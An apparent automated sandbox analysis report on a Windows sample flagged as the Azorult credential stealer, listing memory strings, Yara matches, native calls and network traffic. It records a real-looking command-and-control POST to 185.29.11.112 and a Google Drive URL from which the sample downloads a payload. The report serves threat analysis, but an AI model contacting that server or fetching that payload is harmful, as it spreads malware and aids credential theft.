softokn3.dll.12.dr, nssdbm3.dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: mozglue.dll.12.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: 1COK25f1vT.exe, 0000000C.00000003.484184430.000000001F9EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487119055.000000001F238000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484675523.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487230327.000000001F364000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492897666.000000001F85C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491908994.000000001F660000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491844346.000000001F610000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.483738780.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.489216061.000000001F1EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484708142.000000001F9E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484234075.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, mozglue.dll.12.dr, softokn3.dll.12.dr, nssdbm3.dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr	String found in binary or memory: http://www.mozilla.com0
Source: 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/
Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 1COK25f1vT.exe, 1COK25f1vT.exe, 0000000C.00000002.510992835.0000000000401000.00000020.00020000.sdmp	String found in binary or memory: https://dotbit.me/a/
Source: 1COK25f1vT.exe, 0000000C.00000002.511282880.0000000002150000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=17RU0VECH2DoNYHaGWGuE-Ywt9AUTzsM-
Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 1COK25f1vT.exe, 0000000C.00000003.484184430.000000001F9EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487119055.000000001F238000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484675523.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487230327.000000001F364000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492897666.000000001F85C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491908994.000000001F660000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491844346.000000001F610000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.483738780.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.489216061.000000001F1EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484708142.000000001F9E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484234075.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, mozglue.dll.12.dr, softokn3.dll.12.dr, nssdbm3.dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html
Source: 364961566067931661861453.tmp.12.dr, 364969067119854362121246.tmp.12.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

HTTP traffic detected: POST /rothchildnew/Panel/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 185.29.11.112Content-Length: 107Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 4f ed 3e 33 ed 3e 3c ed 3e 3d ed 3e 3a ed 3e 3b 8a 28 38 8c 28 39 f1 28 39 fb 28 39 fa 28 39 ff 4f 2f fb 3c 2f fb 38 2f fb 34 4b Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8KO>3><>=>:>;(8(9(9(9(9O/</8/4K

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: C:\Users\user\Desktop\1COK25f1vT.exe

Code function: 12_2_00417D84 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,HttpOpenRequestA,HttpSendRequestA,GetMessageA,InternetReadFile,

12_2_00417D84

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=17RU0VECH2DoNYHaGWGuE-Ywt9AUTzsM- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/7bnkiq90sqb2f9a5rfbavvv8a7avoa21/1639944750000/11699732749327025486/*/17RU0VECH2DoNYHaGWGuE-Ywt9AUTzsM-?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0o-b4-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.2.3:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.1:443 -> 192.168.2.3:49787 version: TLS 1.2

System Summary:

Potential malicious icon found

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Malicious sample detected (through community Yara rule)

Source: 12.2.1COK25f1vT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 12.2.1COK25f1vT.exe.2004391e.5.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 12.2.1COK25f1vT.exe.1ffd81cd.7.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 12.2.1COK25f1vT.exe.1ffb61e0.6.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly

Uses 32bit PE files

Source: 1COK25f1vT.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Yara signature match

Source: 12.2.1COK25f1vT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 12.2.1COK25f1vT.exe.2004391e.5.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 12.2.1COK25f1vT.exe.1ffd81cd.7.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 12.2.1COK25f1vT.exe.1ffb61e0.6.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload

Detected potential crypto function

Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_004016DC	0_2_004016DC
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A9128E	0_2_02A9128E
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A963E9	0_2_02A963E9
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99D25	0_2_02A99D25
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A91D79	0_2_02A91D79
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A956AA	0_2_02A956AA
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99EA7	0_2_02A99EA7
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A94EB1	0_2_02A94EB1
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A946B2	0_2_02A946B2
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A98EB2	0_2_02A98EB2
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A966B6	0_2_02A966B6
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A95A8B	0_2_02A95A8B
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A94E9A	0_2_02A94E9A
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A98E9D	0_2_02A98E9D
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99E91	0_2_02A99E91
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99EFE	0_2_02A99EFE
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99EC5	0_2_02A99EC5
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A95AC7	0_2_02A95AC7
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A94ED9	0_2_02A94ED9
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A996D9	0_2_02A996D9
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A98EDD	0_2_02A98EDD
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A98ED1	0_2_02A98ED1
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A94631	0_2_02A94631
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A94637	0_2_02A94637
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A92209	0_2_02A92209
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99E09	0_2_02A99E09
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A9926A	0_2_02A9926A
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99E66	0_2_02A99E66
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A9564D	0_2_02A9564D
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A95BA9	0_2_02A95BA9
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A957B5	0_2_02A957B5
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A9678E	0_2_02A9678E
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A98F80	0_2_02A98F80
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99F9C	0_2_02A99F9C
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A963ED	0_2_02A963ED
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A94FEF	0_2_02A94FEF
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A90BEE	0_2_02A90BEE
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A94FE6	0_2_02A94FE6
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A98FF9	0_2_02A98FF9
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A983CA	0_2_02A983CA
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A98FC2	0_2_02A98FC2
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A953DD	0_2_02A953DD
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A98F2A	0_2_02A98F2A
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A95B32	0_2_02A95B32
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A96737	0_2_02A96737
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99718	0_2_02A99718
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A9671B	0_2_02A9671B
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A9571A	0_2_02A9571A
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99F1F	0_2_02A99F1F
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A94711	0_2_02A94711
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99F6F	0_2_02A99F6F
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A96766	0_2_02A96766
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A95B71	0_2_02A95B71
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A95775	0_2_02A95775
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A95748	0_2_02A95748
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99F46	0_2_02A99F46
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A95CAB	0_2_02A95CAB
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A948A3	0_2_02A948A3
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A96CB9	0_2_02A96CB9
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A958BB	0_2_02A958BB
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A954BE	0_2_02A954BE
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A990B3	0_2_02A990B3
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A9688D	0_2_02A9688D
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99091	0_2_02A99091
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A96497	0_2_02A96497
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A95CEA	0_2_02A95CEA
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A990EE	0_2_02A990EE
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A964E6	0_2_02A964E6
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A980C0	0_2_02A980C0
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A938DA	0_2_02A938DA
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A95C21	0_2_02A95C21
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A95425	0_2_02A95425
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A9683D	0_2_02A9683D
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99035	0_2_02A99035
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A96434	0_2_02A96434
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A95403	0_2_02A95403
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A95805	0_2_02A95805
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A95C06	0_2_02A95C06
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A96C19	0_2_02A96C19
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A95C65	0_2_02A95C65
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A95864	0_2_02A95864
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A94866	0_2_02A94866
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A9904D	0_2_02A9904D
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A9644E	0_2_02A9644E
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A96C5A	0_2_02A96C5A
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A991B6	0_2_02A991B6
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A95599	0_2_02A95599
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A945E5	0_2_02A945E5
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A955FD	0_2_02A955FD
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A965F3	0_2_02A965F3
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A991F7	0_2_02A991F7
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A991C9	0_2_02A991C9
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A965CB	0_2_02A965CB
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99DC3	0_2_02A99DC3
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A945C4	0_2_02A945C4
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A959C4	0_2_02A959C4
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A969D9	0_2_02A969D9
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99DDB	0_2_02A99DDB
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A95D3D	0_2_02A95D3D
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A9913E	0_2_02A9913E
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A95931	0_2_02A95931
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99D32	0_2_02A99D32
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A96534	0_2_02A96534
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A95503	0_2_02A95503
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A9596F	0_2_02A9596F
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99D61	0_2_02A99D61
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A96975	0_2_02A96975
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99D75	0_2_02A99D75
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99D4D	0_2_02A99D4D
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A9694C	0_2_02A9694C
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A95555	0_2_02A95555

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: String function: 00403BF4 appears 46 times
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: String function: 004062FC appears 42 times
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: String function: 00404E98 appears 86 times
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: String function: 0040300C appears 32 times
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: String function: 00403E78 appears 31 times
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: String function: 00404EC0 appears 33 times
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: String function: 004034E4 appears 33 times

Contains functionality to call native functions

Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A963E9 NtAllocateVirtualMemory,LoadLibraryA,	0_2_02A963E9
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A99933 NtProtectVirtualMemory,	0_2_02A99933
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A963ED NtAllocateVirtualMemory,	0_2_02A963ED
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A998A5 NtProtectVirtualMemory,	0_2_02A998A5
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A96497 NtAllocateVirtualMemory,	0_2_02A96497
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A964E6 NtAllocateVirtualMemory,	0_2_02A964E6
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A998FD NtProtectVirtualMemory,	0_2_02A998FD
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A998DD NtProtectVirtualMemory,	0_2_02A998DD
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A96434 NtAllocateVirtualMemory,	0_2_02A96434
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A9644E NtAllocateVirtualMemory,	0_2_02A9644E
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A96534 NtAllocateVirtualMemory,	0_2_02A96534

Abnormal high CPU Usage

Source: C:\Users\user\Desktop\1COK25f1vT.exe

Process Stats: CPU usage > 98%

PE file does not import any functions

Source: api-ms-win-core-file-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.12.dr	Static PE information: No import functions for PE file found

Sample file is different than original file name gathered from version info

Source: 1COK25f1vT.exe, 00000000.00000002.385785614.000000001FB10000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenamepleasely.exe vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 00000000.00000000.280367785.0000000000418000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamepleasely.exe vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 00000000.00000002.382886146.0000000002090000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamepleasely.exeFE2X $- vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe	Binary or memory string: OriginalFilename vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491560498.000000002034C000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491604512.0000000020358000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000000.380644936.0000000000418000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamepleasely.exe vs 1COK25f1vT.exe
